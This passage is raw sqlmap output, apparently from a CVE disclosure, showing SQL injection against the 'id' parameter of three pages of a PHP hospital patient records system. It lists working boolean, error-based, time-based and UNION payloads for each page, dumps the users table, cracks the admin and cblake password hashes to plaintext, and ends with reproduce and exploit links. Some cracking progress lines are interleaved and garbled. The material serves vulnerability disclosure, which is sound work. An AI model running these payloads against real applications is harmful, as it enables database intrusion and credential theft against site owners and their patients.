[12:03:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:03:08] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:03:08] [INFO] testing 'MySQL inline queries'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:03:08] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:03:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:03:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:03:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:03:14] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:03:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:03:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:03:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:03:14] [INFO] target URL appears to have 7 columns in query
[12:03:15] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5342=5342 AND 'TSQh'='TSQh
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4644=4644,1))),0x71626a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TAyy'='TAyy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2728 FROM (SELECT(SLEEP(3)))orQs) AND 'lADO'='lADO
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=-6378' UNION ALL SELECT CONCAT(0x7162626b71,0x534e7a6c74596e766e426e5667486f7661586c6b445a556f485551486a547562436345664f585462,0x71626a6a71),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[12:03:15] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.1.2, Apache 2.4.52, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:03:15] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:03:15] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:03:15] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:03:15] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:03:26] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:03:26] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:03:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:03:26] [INFO] starting 4 processes
[' for user '12:03:32admin] ['O] current status: 1jesu... |] cracked password 'admin123
[12:03:4212:03:42] [] [INFOINFO] current status: P14O1... |] cracked password 'stupid123' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:04:04] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:04:04] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:04:04 /2022-03-01/
SQL - Injecting for parameter 'id' in view_history.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:04:09 /2022-03-01/
[12:04:09] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=om5n296h9bj...urhf8qd1t0'). Do you want to use those [Y/n] Y
[12:04:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:04:09] [INFO] testing if the target URL content is stable
[12:04:10] [INFO] target URL content is stable
[12:04:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:04:10] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:04:10] [WARNING] reflective value(s) found and filtering out
[12:04:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:04:10] [INFO] testing 'Generic inline queries'
[12:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:04:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:04:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[12:04:14] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable
[12:04:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:04:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:04:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:04:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:04:14] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:04:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:04:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:04:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:04:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:04:14] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:04:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:04:14] [INFO] testing 'MySQL inline queries'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:04:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:04:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:04:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:04:20] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:04:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:04:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:04:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:04:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:04:21] [INFO] target URL appears to have 10 columns in query
[12:04:21] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[12:04:21] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 2894=2894#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' OR (SELECT 2823 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(2823=2823,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NtWR
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2385 FROM (SELECT(SLEEP(3)))Nuwd)-- bAsV
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b6a71,0x54706a5a776b54714371787a617078774f7450657455496f7a614e75547177536961544c74546875,0x7170717871),NULL,NULL,NULL,NULL,NULL,NULL#
---
[12:04:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 8.1.2, Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:04:21] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:04:21] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:04:21] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:04:21] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:04:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:04:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:04:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:04:21] [INFO] starting 4 processes
[12:04:35cblake12:04:35't status: 09100... |INFO] cracked password 'stupid123
] [] [INFOINFO] current status: 09101... /] cracked password 'admin123' for user 'admin'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:05:01] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:05:01] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:05:01 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_admission.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:05:09 /2022-03-01/
[12:05:09] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=20uv7un8gs4...8s8qj5kopv'). Do you want to use those [Y/n] Y
[12:05:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:05:09] [INFO] testing if the target URL content is stable
[12:05:10] [INFO] target URL content is stable
[12:05:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:05:10] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:05:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:05:10] [WARNING] reflective value(s) found and filtering out
[12:05:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:05:10] [INFO] testing 'Generic inline queries'
[12:05:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:05:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:05:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[12:05:15] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[12:05:16] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string="Fatal")
[12:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:05:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:05:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:05:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:05:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:05:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:05:16] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:05:16] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:05:16] [INFO] testing 'MySQL inline queries'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:05:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:05:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:05:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:05:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:05:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:05:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:05:31] [INFO] target URL appears to have 8 columns in query
[12:05:31] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 204 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' RLIKE (SELECT (CASE WHEN (1299=1299) THEN 1 ELSE 0x28 END))-- QynS
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' OR (SELECT 7634 FROM(SELECT COUNT(*),CONCAT(0x716b7a6b71,(SELECT (ELT(7634=7634,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vmRW
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8229 FROM (SELECT(SLEEP(3)))Qpzi)-- hEWR
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x716b7a6b71,0x446147684b447641734a4e63496e494a4b67784956554b4952515543684251577076656f42487754,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[12:05:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.1.2, PHP, Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:05:31] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:05:31] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:05:31] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:05:31] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:05:31] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:05:31] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:05:31] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:05:31] [INFO] starting 4 processes
[12:05:37] [INFO] cracked password 'admin123' for user 'admin'
[] [12:05:48INFO] [] current status: Upgra... |INFO] cracked password 'stupid123' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:06:08] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:06:08] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:06:08 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_room_type.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:06:15 /2022-03-01/
[12:06:15] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5u1m2tvs8rd...mm5ijndlgg'). Do you want to use those [Y/n] Y
[12:06:15] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:06:15] [INFO] testing if the target URL content is stable
[12:06:16] [INFO] target URL content is stable
[12:06:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:06:16] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:06:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:06:16] [WARNING] reflective value(s) found and filtering out
[12:06:16] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Private Room with Single Patient Bed.")
[12:06:16] [INFO] testing 'Generic inline queries'
[12:06:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:06:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:06:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:06:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:06:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:06:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:06:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:06:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:06:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:06:17] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:06:17] [INFO] testing 'MySQL inline queries'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:06:17] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:06:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:06:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:06:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:06:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:06:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:06:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:06:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:06:23] [INFO] target URL appears to have 6 columns in query
[12:06:24] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4275=4275 AND 'Pbap'='Pbap
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 7905 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(7905=7905,1))),0x716b717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AwDy'='AwDy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1604 FROM (SELECT(SLEEP(3)))MPcP) AND 'bAKs'='bAKs
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-6478' UNION ALL SELECT CONCAT(0x71626a6b71,0x616d625874694476617a78684a536b747145584d54786b47637545457570594e6e5766734f587249,0x716b717171),NULL,NULL,NULL,NULL,NULL-- -
---
[12:06:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP, PHP 8.1.2
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:06:24] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:06:24] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:06:24] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:06:24] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:06:24] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:06:24] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:06:24] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:06:24] [INFO] starting 4 processes
[] cracked password '12:06:30admin123] [' for user 'INFO] current status: 1teli... |admin'
[cblake12:06:40's: a9243... /12:06:40] [INFO] cracked password 'stupid123' for user '
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:07:03] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:07:03] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:07:03 /2022-03-01/
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-25003)
## Proof and Exploit:
[href](https://streamable.com/ymn0ko)